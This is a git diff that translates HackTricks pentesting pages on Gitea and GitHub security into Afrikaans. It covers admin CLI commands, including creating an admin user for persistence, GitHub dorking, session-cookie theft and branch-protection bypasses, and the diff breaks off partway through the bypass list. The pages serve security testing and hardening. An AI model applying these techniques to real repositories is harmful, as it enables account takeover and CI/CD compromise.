-- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` will generate a token of the indicated type (persistence)
-- `gitea admin user change-password --username admin --password newpassword` Change the password
-- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Create new admin user and get an access token
+- `gitea dump` sal gitea dump en 'n .zip lêer genereer.
+- `gitea generate secret INTERNAL_TOKEN/JWT_SECRET/SECRET_KEY/LFS_JWT_SECRET` sal 'n teken van die aangeduide tipe genereer (volharding).
+- `gitea admin user change-password --username admin --password newpassword` Verander die wagwoord.
+- `gitea admin user create --username newuser --password superpassword --email user@user.user --admin --access-token` Skep 'n nuwe admin gebruiker en kry 'n toegangsteken.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
index e6e4d9ba3..411c83250 100644
--- a/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
+++ b/src/pentesting-ci-cd/gitea-security/basic-gitea-information.md
@@ -4,104 +4,100 @@
 
 ## Basic Structure
 
-The basic Gitea environment structure is to group repos by **organization(s),** each of them may contain **several repositories** and **several teams.** However, note that just like in github users can have repos outside of the organization.
+Die basiese Gitea omgewingstruktuur is om repos te groepeer volgens **organisasie(s),** elk van hulle kan **verskeie repositories** en **verskeie span** bevat. Let egter daarop dat, net soos in github, gebruikers repos buite die organisasie kan hê.
 
-Moreover, a **user** can be a **member** of **different organizations**. Within the organization the user may have **different permissions over each repository**.
+Boonop kan 'n **gebruiker** 'n **lid** van **verskillende organisasies** wees. Binne die organisasie kan die gebruiker **verskillende toestemmings oor elke repository** hê.
 
-A user may also be **part of different teams** with different permissions over different repos.
+'n Gebruiker kan ook **deel wees van verskillende spanne** met verskillende toestemmings oor verskillende repos.
 
-And finally **repositories may have special protection mechanisms**.
+En uiteindelik **kan repositories spesiale beskermingsmeganismes hê**.
 
 ## Permissions
 
 ### Organizations
 
-When an **organization is created** a team called **Owners** is **created** and the user is put inside of it. This team will give **admin access** over the **organization**, those **permissions** and the **name** of the team **cannot be modified**.
+Wanneer 'n **organisasie geskep word** word 'n span genaamd **Eienaars** **geskep** en die gebruiker word daarin geplaas. Hierdie span sal **admin toegang** oor die **organisasie** gee, daardie **toestemmings** en die **naam** van die span **kan nie gewysig word** nie.
 
-**Org admins** (owners) can select the **visibility** of the organization:
+**Org admins** (eienaars) kan die **sigbaarheid** van die organisasie kies:
 
-- Public
-- Limited (logged in users only)
-- Private (members only)
+- Publiek
+- Beperk (slegs ingelogde gebruikers)
+- Privaat (slegs lede)
 
-**Org admins** can also indicate if the **repo admins** can **add and or remove access** for teams. They can also indicate the max number of repos.
+**Org admins** kan ook aandui of die **repo admins** **toegang kan voeg of verwyder** vir spanne. Hulle kan ook die maksimum aantal repos aandui.
 
-When creating a new team, several important settings are selected:
+Wanneer 'n nuwe span geskep word, word verskeie belangrike instellings gekies:
 
-- It's indicated the **repos of the org the members of the team will be able to access**: specific repos (repos where the team is added) or all.
-- It's also indicated **if members can create new repos** (creator will get admin access to it)
-- The **permissions** the **members** of the repo will **have**:
-  - **Administrator** access
-  - **Specific** access:
+- Dit word aangedui watter **repos van die org die lede van die span toegang sal hê**: spesifieke repos (repos waar die span bygevoeg is) of almal.
+- Dit word ook aangedui **of lede nuwe repos kan skep** (die skepper sal admin toegang tot dit kry)
+- Die **toestemmings** wat die **lede** van die repo **sal hê**:
+- **Administrateur** toegang
+- **Spesifieke** toegang:
 
 ![](<../../images/image (118).png>)
 
 ### Teams & Users
 
-In a repo, the **org admin** and the **repo admins** (if allowed by the org) can **manage the roles** given to collaborators (other users) and teams. There are **3** possible **roles**:
+In 'n repo kan die **org admin** en die **repo admins** (indien toegelaat deur die org) die **rolle** wat aan samewerkers (ander gebruikers) en spanne gegee word, **bestuur**. Daar is **3** moontlike **rolle**:
 
-- Administrator
-- Write
-- Read
+- Administrateur
+- Skryf
+- Lees
 
 ## Gitea Authentication
 
 ### Web Access
 
-Using **username + password** and potentially (and recommended) a 2FA.
+Gebruik **gebruikersnaam + wagwoord** en moontlik (en aanbeveel) 'n 2FA.
 
 ### **SSH Keys**
 
-You can configure your account with one or several public keys allowing the related **private key to perform actions on your behalf.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
+Jy kan jou rekening met een of verskeie publieke sleutels konfigureer wat die verwante **private sleutel toelaat om aksies namens jou uit te voer.** [http://localhost:3000/user/settings/keys](http://localhost:3000/user/settings/keys)
 
 #### **GPG Keys**
 
-You **cannot impersonate the user with these keys** but if you don't use it it might be possible that you **get discover for sending commits without a signature**.
+Jy **kan nie die gebruiker met hierdie sleutels naboots nie** maar as jy dit nie gebruik nie, kan dit moontlik wees dat jy **ontdek word vir die stuur van commits sonder 'n handtekening**.
 
 ### **Personal Access Tokens**
 
-You can generate personal access token to **give an application access to your account**. A personal access token gives full access over your account: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
+Jy kan 'n persoonlike toegangstoken genereer om **'n toepassing toegang tot jou rekening te gee**. 'n Persoonlike toegangstoken gee volle toegang oor jou rekening: [http://localhost:3000/user/settings/applications](http://localhost:3000/user/settings/applications)
 
 ### Oauth Applications
 
-Just like personal access tokens **Oauth applications** will have **complete access** over your account and the places your account has access because, as indicated in the [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes), scopes aren't supported yet:
+Net soos persoonlike toegangstokens sal **Oauth applications** **volledige toegang** oor jou rekening en die plekke waar jou rekening toegang het hê, omdat, soos in die [docs](https://docs.gitea.io/en-us/oauth2-provider/#scopes) aangedui, scopes nog nie ondersteun word nie:
 
 ![](<../../images/image (194).png>)
 
 ### Deploy keys
 
-Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos.
+Deploy sleutels kan slegs lees- of skryftoegang tot die repo hê, so hulle kan interessant wees om spesifieke repos te kompromitteer.
 
 ## Branch Protections
 
-Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**.
+Branch beskermings is ontwerp om **nie volledige beheer van 'n repository** aan die gebruikers te gee nie. Die doel is om **verskeie beskermingsmetodes te plaas voordat jy in staat is om kode in 'n sekere tak te skryf**.
 
-The **branch protections of a repository** can be found in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
+Die **branch beskermings van 'n repository** kan gevind word in _https://localhost:3000/\<orgname>/\<reponame>/settings/branches_
 
 > [!NOTE]
-> It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo.
+> Dit is **nie moontlik om 'n branch beskerming op organisasievlak in te stel nie**. So al hulle moet op elke repo verklaar word.
 
-Different protections can be applied to a branch (like to master):
+Verskillende beskermings kan op 'n tak toegepas word (soos op master):
 
-- **Disable Push**: No-one can push to this branch
-- **Enable Push**: Anyone with access can push, but not force push.
-- **Whitelist Restricted Push**: Only selected users/teams can push to this branch (but no force push)
-- **Enable Merge Whitelist**: Only whitelisted users/teams can merge PRs.
-- **Enable Status checks:** Require status checks to pass before merging.
-- **Require approvals**: Indicate the number of approvals required before a PR can be merged.
-- **Restrict approvals to whitelisted**: Indicate users/teams that can approve PRs.
-- **Block merge on rejected reviews**: If changes are requested, it cannot be merged (even if the other checks pass)
-- **Block merge on official review requests**: If there official review requests it cannot be merged
-- **Dismiss stale approvals**: When new commits, old approvals will be dismissed.
-- **Require Signed Commits**: Commits must be signed.
-- **Block merge if pull request is outdated**
-- **Protected/Unprotected file patterns**: Indicate patterns of files to protect/unprotect against changes
+- **Deaktiveer Push**: Niemand kan na hierdie tak push nie
+- **Aktiveer Push**: Enigeen met toegang kan push, maar nie force push nie.
+- **Whitelist Beperkte Push**: Slegs geselekteerde gebruikers/spanne kan na hierdie tak push (maar geen force push nie)
+- **Aktiveer Merge Whitelist**: Slegs whitelisted gebruikers/spanne kan PRs saamvoeg.
+- **Aktiveer Status kontroles:** Vereis dat status kontroles slaag voordat dit saamgevoeg word.
+- **Vereis goedkeuring**: Dui die aantal goedkeuringe aan wat vereis word voordat 'n PR saamgevoeg kan word.
+- **Beperk goedkeuringe tot whitelisted**: Dui gebruikers/spanne aan wat PRs kan goedkeur.
+- **Blokkeer saamvoeg op verwerkte hersienings**: As veranderinge aangevra word, kan dit nie saamgevoeg word nie (selfs as die ander kontroles slaag)
+- **Blokkeer saamvoeg op amptelike hersieningsversoeke**: As daar amptelike hersieningsversoeke is, kan dit nie saamgevoeg word nie
+- **Verwerp verouderde goedkeuringe**: Wanneer nuwe commits gemaak word, sal ou goedkeuringe verwerp word.
+- **Vereis Onderteken Commits**: Commits moet onderteken wees.
+- **Blokkeer saamvoeg as die pull request verouderd is**
+- **Beskermde/onbeskermde lêerpatrone**: Dui patrone van lêers aan om teen veranderinge te beskerm/onbeskerm.
 
 > [!NOTE]
-> As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline.
+> Soos jy kan sien, selfs al het jy daarin geslaag om 'n paar akrediteerbare inligting van 'n gebruiker te verkry, **kan repos beskerm wees wat jou verhoed om kode na master te push** byvoorbeeld om die CI/CD-pyplyn te kompromitteer.
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/README.md b/src/pentesting-ci-cd/github-security/README.md
index cdad12b57..5addd67ce 100644
--- a/src/pentesting-ci-cd/github-security/README.md
+++ b/src/pentesting-ci-cd/github-security/README.md
@@ -1,42 +1,42 @@
-# Github Security
+# Github Veiligheid
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## What is Github
+## Wat is Github
 
-(From [here](https://kinsta.com/knowledgebase/what-is-github/)) At a high level, **GitHub is a website and cloud-based service that helps developers store and manage their code, as well as track and control changes to their code**.
+(From [here](https://kinsta.com/knowledgebase/what-is-github/)) Op 'n hoë vlak, **GitHub is 'n webwerf en wolk-gebaseerde diens wat ontwikkelaars help om hul kode te stoor en te bestuur, sowel as om veranderinge aan hul kode te volg en te beheer**.
 
-### Basic Information
+### Basiese Inligting
 
 {{#ref}}
 basic-github-information.md
 {{#endref}}
 
-## External Recon
+## Eksterne Recon
 
-Github repositories can be configured as public, private and internal.
+Github repositories kan gekonfigureer word as publiek, privaat en intern.
 
-- **Private** means that **only** people of the **organisation** will be able to access them
-- **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it
-- **Public** means that **all internet** is going to be able to access it.
+- **Privaat** beteken dat **slegs** mense van die **organisasie** toegang sal hê
+- **Intern** beteken dat **slegs** mense van die **onderneming** ( 'n onderneming kan verskeie organisasies hê) toegang sal hê
+- **Publiek** beteken dat **alle internet** toegang sal hê.
 
-In case you know the **user, repo or organisation you want to target** you can use **github dorks** to find sensitive information or search for **sensitive information leaks** **on each repo**.
+As jy die **gebruikersnaam, repo of organisasie wat jy wil teiken** ken, kan jy **github dorks** gebruik om sensitiewe inligting te vind of te soek na **sensitiewe inligting lek** **op elke repo**.
 
 ### Github Dorks
 
-Github allows to **search for something specifying as scope a user, a repo or an organisation**. Therefore, with a list of strings that are going to appear close to sensitive information you can easily **search for potential sensitive information in your target**.
+Github laat jou toe om **vir iets te soek deur 'n gebruiker, 'n repo of 'n organisasie as omvang te spesifiseer**. Daarom, met 'n lys van strings wat naby sensitiewe inligting gaan verskyn, kan jy maklik **soek na potensiële sensitiewe inligting in jou teiken**.
 
-Tools (each tool contains its list of dorks):
+Gereedskap (elke gereedskap bevat sy lys van dorks):
 
-- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks list](https://github.com/obheda12/GitDorker/tree/master/Dorks))
-- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks list](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
-- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks list](https://github.com/hisxo/gitGraber/tree/master/wordlists))
+- [https://github.com/obheda12/GitDorker](https://github.com/obheda12/GitDorker) ([Dorks lys](https://github.com/obheda12/GitDorker/tree/master/Dorks))
+- [https://github.com/techgaun/github-dorks](https://github.com/techgaun/github-dorks) ([Dorks lys](https://github.com/techgaun/github-dorks/blob/master/github-dorks.txt))
+- [https://github.com/hisxo/gitGraber](https://github.com/hisxo/gitGraber) ([Dorks lys](https://github.com/hisxo/gitGraber/tree/master/wordlists))
 
-### Github Leaks
+### Github Lekke
 
-Please, note that the github dorks are also meant to search for leaks using github search options. This section is dedicated to those tools that will **download each repo and search for sensitive information in them** (even checking certain depth of commits).
+Let asseblief daarop dat die github dorks ook bedoel is om te soek na lekke deur gebruik te maak van github soekopsies. Hierdie afdeling is toegewy aan daardie gereedskap wat **elke repo sal aflaai en soek na sensitiewe inligting daarin** (selfs sekere diepte van verbintenisse nagaan).
 
-Tools (each tool contains its list of regexes):
+Gereedskap (elke gereedskap bevat sy lys van regexes):
 
 - [https://github.com/zricethezav/gitleaks](https://github.com/zricethezav/gitleaks)
 - [https://github.com/trufflesecurity/truffleHog](https://github.com/trufflesecurity/truffleHog)
@@ -47,202 +47,190 @@ Tools (each tool contains its list of regexes):
 - [https://github.com/awslabs/git-secrets](https://github.com/awslabs/git-secrets)
 
 > [!WARNING]
-> When you look for leaks in a repo and run something like `git log -p` don't forget there might be **other branches with other commits** containing secrets!
+> Wanneer jy soek na lekke in 'n repo en iets soos `git log -p` uitvoer, moenie vergeet daar mag **ander takke met ander verbintenisse** wees wat geheime bevat nie!
 
-### External Forks
+### Eksterne Forks
 
-It's possible to **compromise repos abusing pull requests**. To know if a repo is vulnerable you mostly need to read the Github Actions yaml configs. [**More info about this below**](./#execution-from-a-external-fork).
+Dit is moontlik om **repos te kompromitteer deur pull versoeke te misbruik**. Om te weet of 'n repo kwesbaar is, moet jy meestal die Github Actions yaml konfigurasies lees. [**Meer inligting hieroor hieronder**](./#execution-from-a-external-fork).
 
-### Github Leaks in deleted/internal forks
+### Github Lekke in verwyderde/intern forks
 
-Even if deleted or internal it might be possible to obtain sensitive data from forks of github repositories. Check it here:
+Selfs al is dit verwyder of intern, mag dit moontlik wees om sensitiewe data van forks van github repositories te verkry. Kyk dit hier:
 
 {{#ref}}
 accessible-deleted-data-in-github.md
 {{#endref}}
 
-## Organization Hardening
+## Organisasie Versterking
 
-### Member Privileges
+### Lid Privileges
 
-There are some **default privileges** that can be assigned to **members** of the organization. These can be controlled from the page `https://github.com/organizations/<org_name>/settings/member_privileges` or from the [**Organizations API**](https://docs.github.com/en/rest/orgs/orgs).
+Daar is 'n paar **standaard voorregte** wat aan **lede** van die organisasie toegeken kan word. Hierdie kan beheer word vanaf die bladsy `https://github.com/organizations/<org_name>/settings/member_privileges` of vanaf die [**Organisasies API**](https://docs.github.com/en/rest/orgs/orgs).
 
-- **Base permissions**: Members will have the permission None/Read/write/Admin over the org repositories. Recommended is **None** or **Read**.
-- **Repository forking**: If not necessary, it's better to **not allow** members to fork organization repositories.
-- **Pages creation**: If not necessary, it's better to **not allow** members to publish pages from the org repos. If necessary you can allow to create public or private pages.
-- **Integration access requests**: With this enabled outside collaborators will be able to request access for GitHub or OAuth apps to access this organization and its resources. It's usually needed, but if not, it's better to disable it.
-  - _I couldn't find this info in the APIs response, share if you do_
-- **Repository visibility change**: If enabled, **members** with **admin** permissions for the **repository** will be able to **change its visibility**. If disabled, only organization owners can change repository visibilities. If you **don't** want people to make things **public**, make sure this is **disabled**.
-  - _I couldn't find this info in the APIs response, share if you do_
-- **Repository deletion and transfer**: If enabled, members with **admin** permissions for the repository will be able to **delete** or **transfer** public and private **repositories.**
-  - _I couldn't find this info in the APIs response, share if you do_
-- **Allow members to create teams**: If enabled, any **member** of the organization will be able to **create** new **teams**. If disabled, only organization owners can create new teams. It's better to have this disabled.
-  - _I couldn't find this info in the APIs response, share if you do_
-- **More things can be configured** in this page but the previous are the ones more security related.
+- **Basiese toestemmings**: Lede sal die toestemming None/Lees/schrijf/Admin oor die org repositories hê. Dit word aanbeveel om **None** of **Lees** te hê.
+- **Repository fork**: As dit nie nodig is nie, is dit beter om **nie toe te laat** dat lede organisasie repositories fork nie.
+- **Bladsy skepping**: As dit nie nodig is nie, is dit beter om **nie toe te laat** dat lede bladsye van die org repos publiseer nie. As dit nodig is, kan jy toelaat om publieke of private bladsye te skep.
+- **Integrasie toegang versoeke**: Met hierdie geaktiveer sal buite medewerkers toegang kan versoek vir GitHub of OAuth apps om toegang tot hierdie organisasie en sy hulpbronne te verkry. Dit is gewoonlik nodig, maar as dit nie is nie, is dit beter om dit te deaktiveer.
+- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_
+- **Repository sigbaarheid verandering**: As geaktiveer, sal **lede** met **admin** toestemmings vir die **repository** in staat wees om **sy sigbaarheid te verander**. As gedeaktiveer, kan slegs organisasie eienaars repository sigbaarhede verander. As jy **nie** wil hê mense moet dinge **publiek** maak nie, maak seker dit is **gedeaktiveer**.
+- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_
+- **Repository verwydering en oordrag**: As geaktiveer, sal lede met **admin** toestemmings vir die repository in staat wees om **te verwyder** of **te oordra** publieke en private **repositories.**
+- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_
+- **Laat lede toe om span te skep**: As geaktiveer, sal enige **lid** van die organisasie in staat wees om **nuwe** **spanne** te **skep**. As gedeaktiveer, kan slegs organisasie eienaars nuwe spanne skep. Dit is beter om dit gedeaktiveer te hê.
+- _Ek kon nie hierdie inligting in die API's antwoord vind nie, deel as jy dit doen_
+- **Meer dinge kan geconfigureer word** op hierdie bladsy, maar die vorige is diegene wat meer sekuriteit gerelateerd is.
 
-### Actions Settings
+### Aksies Instellings
 
-Several security related settings can be configured for actions from the page `https://github.com/organizations/<org_name>/settings/actions`.
+Verskeie sekuriteit gerelateerde instellings kan geconfigureer word vir aksies vanaf die bladsy `https://github.com/organizations/<org_name>/settings/actions`.
 
 > [!NOTE]
-> Note that all this configurations can also be set on each repository independently
+> Let daarop dat al hierdie konfigurasies ook op elke repository onafhanklik gestel kan word
 
-- **Github actions policies**: It allows you to indicate which repositories can tun workflows and which workflows should be allowed. It's recommended to **specify which repositories** should be allowed and not allow all actions to run.
-  - [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
-- **Fork pull request workflows from outside collaborators**: It's recommended to **require approval for all** outside collaborators.
-  - _I couldn't find an API with this info, share if you do_
-- **Run workflows from fork pull requests**: It's highly **discouraged to run workflows from pull requests** as maintainers of the fork origin will be given the ability to use tokens with read permissions on the source repository.
-  - _I couldn't find an API with this info, share if you do_
-- **Workflow permissions**: It's highly recommended to **only give read repository permissions**. It's discouraged to give write and create/approve pull requests permissions to avoid the abuse of the GITHUB_TOKEN given to running workflows.
-  - [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
+- **Github aksies beleid**: Dit laat jou toe om aan te dui watter repositories workflows kan uitvoer en watter workflows toegelaat moet word. Dit word aanbeveel om **te spesifiseer watter repositories** toegelaat moet word en nie alle aksies toe te laat om te loop nie.
+- [**API-1**](https://docs.github.com/en/rest/actions/permissions#get-allowed-actions-and-reusable-workflows-for-an-organization)**,** [**API-2**](https://docs.github.com/en/rest/actions/permissions#list-selected-repositories-enabled-for-github-actions-in-an-organization)
+- **Fork pull versoek workflows van buite medewerkers**: Dit word aanbeveel om **goedkeuring vir alle** buite medewerkers te vereis.
+- _Ek kon nie 'n API met hierdie inligting vind nie, deel as jy dit doen_
+- **Voer workflows uit van fork pull versoeke**: Dit is hoogs **afgerade om workflows van pull versoeke uit te voer** aangesien onderhouders van die fork oorsprong die vermoë sal hê om tokens met lees toestemmings op die bron repository te gebruik.
+- _Ek kon nie 'n API met hierdie inligting vind nie, deel as jy dit doen_
+- **Workflow toestemmings**: Dit word hoogs aanbeveel om **slegs lees repository toestemmings te gee**. Dit word afgerade om skryf en skep/goedkeur pull versoek toestemmings te gee om die misbruik van die GITHUB_TOKEN wat aan lopende workflows gegee word, te vermy.
+- [**API**](https://docs.github.com/en/rest/actions/permissions#get-default-workflow-permissions-for-an-organization)
 
-### Integrations
+### Integrasies
 
-_Let me know if you know the API endpoint to access this info!_
+_Laat weet my as jy die API eindpunt ken om hierdie inligting te bekom!_
 
-- **Third-party application access policy**: It's recommended to restrict the access to every application and allow only the needed ones (after reviewing them).
-- **Installed GitHub Apps**: It's recommended to only allow the needed ones (after reviewing them).
+- **Derdeparty toepassing toegang beleid**: Dit word aanbeveel om die toegang tot elke toepassing te beperk en slegs die nodige te laat (na hersiening).
+- **Gemonteerde GitHub Apps**: Dit word aanbeveel om slegs die nodige te laat (na hersiening).
 
-## Recon & Attacks abusing credentials
+## Recon & Aanvalle wat kredensiale misbruik
 
-For this scenario we are going to suppose that you have obtained some access to a github account.
+Vir hierdie scenario gaan ons veronderstel dat jy toegang tot 'n github rekening verkry het.
 
-### With User Credentials
+### Met Gebruiker Kredensiale
 
-If you somehow already have credentials for a user inside an organization you can **just login** and check which **enterprise and organization roles you have**, if you are a raw member, check which **permissions raw members have**, in which **groups** you are, which **permissions you have** over which **repos,** and **how are the repos protected.**
+As jy op een of ander manier reeds kredensiale vir 'n gebruiker binne 'n organisasie het, kan jy **net aanmeld** en kyk watter **onderneming en organisasie rolle jy het**, as jy 'n gewone lid is, kyk watter **toestemmings gewone lede het**, in watter **groepe** jy is, watter **toestemmings jy het** oor watter **repos,** en **hoe die repos beskerm word.**
 
-Note that **2FA may be used** so you will only be able to access this information if you can also **pass that check**.
+Let daarop dat **2FA dalk gebruik word** sodat jy slegs toegang tot hierdie inligting sal hê as jy ook **daardie toets kan slaag**.
 
 > [!NOTE]
-> Note that if you **manage to steal the `user_session` cookie** (currently configured with SameSite: Lax) you can **completely impersonate the user** without needing credentials or 2FA.
+> Let daarop dat as jy **slaag om die `user_session` koekie te steel** (huidiglik geconfigureer met SameSite: Lax) jy kan **volledig die gebruiker naboots** sonder om kredensiale of 2FA te benodig.
 
-Check the section below about [**branch protections bypasses**](./#branch-protection-bypass) in case it's useful.
+Kyk die afdeling hieronder oor [**tak beskerming omseilings**](./#branch-protection-bypass) in geval dit nuttig is.
 
-### With User SSH Key
+### Met Gebruiker SSH Sleutel
 
-Github allows **users** to set **SSH keys** that will be used as **authentication method to deploy code** on their behalf (no 2FA is applied).
-
-With this key you can perform **changes in repositories where the user has some privileges**, however you can not sue it to access github api to enumerate the environment. However, you can get **enumerate local settings** to get information about the repos and user you have access to:
+Github laat **gebruikers** toe om **SSH sleutels** in te stel wat as **authentikasie metode gebruik sal word om kode** namens hulle te ontplooi (geen 2FA word toegepas nie).
 
+Met hierdie sleutel kan jy **veranderinge in repositories waar die gebruiker sekere voorregte het, uitvoer**, egter jy kan dit nie gebruik om toegang tot die github api te verkry om die omgewing te tel nie. Jy kan egter **lokale instellings tel** om inligting oor die repos en gebruiker waartoe jy toegang het, te verkry:
 ```bash
 # Go to the the repository folder
 # Get repo config and current user name and email
 git config --list
 ```
+As die gebruiker sy gebruikersnaam as sy github gebruikersnaam gekonfigureer het, kan jy toegang verkry tot die **publieke sleutels wat hy in sy rekening ingestel het** in _https://github.com/\<github_username>.keys_, jy kan dit nagaan om te bevestig dat die private sleutel wat jy gevind het, gebruik kan word.
 
-If the user has configured its username as his github username you can access the **public keys he has set** in his account in _https://github.com/\<github_username>.keys_, you could check this to confirm the private key you found can be used.
+**SSH sleutels** kan ook in repositories as **deploy sleutels** ingestel word. Enigeen met toegang tot hierdie sleutel sal in staat wees om **projekte vanaf 'n repository te begin**. Gewoonlik in 'n bediener met verskillende deploy sleutels sal die plaaslike lêer **`~/.ssh/config`** jou inligting gee oor watter sleutel verband hou.
 
-**SSH keys** can also be set in repositories as **deploy keys**. Anyone with access to this key will be able to **launch projects from a repository**. Usually in a server with different deploy keys the local file **`~/.ssh/config`** will give you info about key is related.
+#### GPG Sleutels
 
-#### GPG Keys
-
-As explained [**here**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) sometimes it's needed to sign the commits or you might get discovered.
-
-Check locally if the current user has any key with:
+Soos verduidelik [**hier**](https://github.com/carlospolop/hacktricks-cloud/blob/master/pentesting-ci-cd/github-security/broken-reference/README.md) is dit soms nodig om die verbintenisse te teken of jy mag ontdek word.
 
+Kontroleer plaaslik of die huidige gebruiker enige sleutel het met:
 ```shell
 gpg --list-secret-keys --keyid-format=long
 ```
+### Met Gebruikerstoken
 
-### With User Token
+Vir 'n inleiding oor [**Gebruikerstokens kyk na die basiese inligting**](basic-github-information.md#personal-access-tokens).
 
-For an introduction about [**User Tokens check the basic information**](basic-github-information.md#personal-access-tokens).
+'n Gebruikerstoken kan gebruik word **in plaas van 'n wagwoord** vir Git oor HTTPS, of kan gebruik word om [**te autentiseer by die API oor Basiese Autentisering**](https://docs.github.com/v3/auth/#basic-authentication). Afhangende van die voorregte wat daaraan gekoppel is, mag jy in staat wees om verskillende aksies uit te voer.
 
-A user token can be used **instead of a password** for Git over HTTPS, or can be used to [**authenticate to the API over Basic Authentication**](https://docs.github.com/v3/auth/#basic-authentication). Depending on the privileges attached to it you might be able to perform different actions.
+'n Gebruikerstoken lyk soos volg: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
 
-A User token looks like this: `ghp_EfHnQFcFHX6fGIu5mpduvRiYR584kK0dX123`
+### Met Oauth Toepassing
 
-### With Oauth Application
+Vir 'n inleiding oor [**Github Oauth Toepassings kyk na die basiese inligting**](basic-github-information.md#oauth-applications).
 
-For an introduction about [**Github Oauth Applications check the basic information**](basic-github-information.md#oauth-applications).
+'n Aanvaller mag 'n **kwaadwillige Oauth Toepassing** skep om toegang te verkry tot voorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishingveldtog aanvaar.
 
-An attacker might create a **malicious Oauth Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Hierdie is die [skoppe wat 'n Oauth toepassing kan versoek](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). 'n Gebruiker moet altyd die versoekte skoppe nagaan voordat dit aanvaar word.
 
-These are the [scopes an Oauth application can request](https://docs.github.com/en/developers/apps/building-oauth-apps/scopes-for-oauth-apps). A should always check the scopes requested before accepting them.
+Boonop, soos verduidelik in die basiese inligting, **kan organisasies toegang tot derdeparty-toepassings gee/ontneem** tot inligting/repos/aksies wat met die organisasie verband hou.
 
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+### Met Github Toepassing
 
-### With Github Application
+Vir 'n inleiding oor [**Github Toepassings kyk na die basiese inligting**](basic-github-information.md#github-applications).
 
-For an introduction about [**Github Applications check the basic information**](basic-github-information.md#github-applications).
+'n Aanvaller mag 'n **kwaadwillige Github Toepassing** skep om toegang te verkry tot voorregte data/aksies van die gebruikers wat dit waarskynlik as deel van 'n phishingveldtog aanvaar.
 
-An attacker might create a **malicious Github Application** to access privileged data/actions of the users that accepts them probably as part of a phishing campaign.
+Boonop, soos verduidelik in die basiese inligting, **kan organisasies toegang tot derdeparty-toepassings gee/ontneem** tot inligting/repos/aksies wat met die organisasie verband hou.
 
-Moreover, as explained in the basic information, **organizations can give/deny access to third party applications** to information/repos/actions related with the organisation.
+## Kompromie & Misbruik Github Aksie
 
-## Compromise & Abuse Github Action
-
-There are several techniques to compromise and abuse a Github Action, check them here:
+Daar is verskeie tegnieke om 'n Github Aksie te kompromitteer en te misbruik, kyk hulle hier:
 
 {{#ref}}
 abusing-github-actions/
 {{#endref}}
 
-## Branch Protection Bypass
+## Takbeskerming Omseiling
 
-- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.
-  - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._
-- **Dismiss approvals when new commits are pushed**: If this isn’t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.
-- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.
-  - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**
-- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.
-- **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections.
-- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.
-- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.
-- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).
-  - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.
+- **Vereis 'n aantal goedkeuringe**: As jy verskeie rekeninge gecompromitteer het, kan jy dalk net jou PR's van ander rekeninge aanvaar. As jy net die rekening het waaruit jy die PR geskep het, kan jy nie jou eie PR aanvaar nie. As jy egter toegang het tot 'n **Github Aksie** omgewing binne die repo, kan jy met die **GITHUB_TOKEN** dalk jou PR **goedkeur** en op hierdie manier 1 goedkeuring kry.
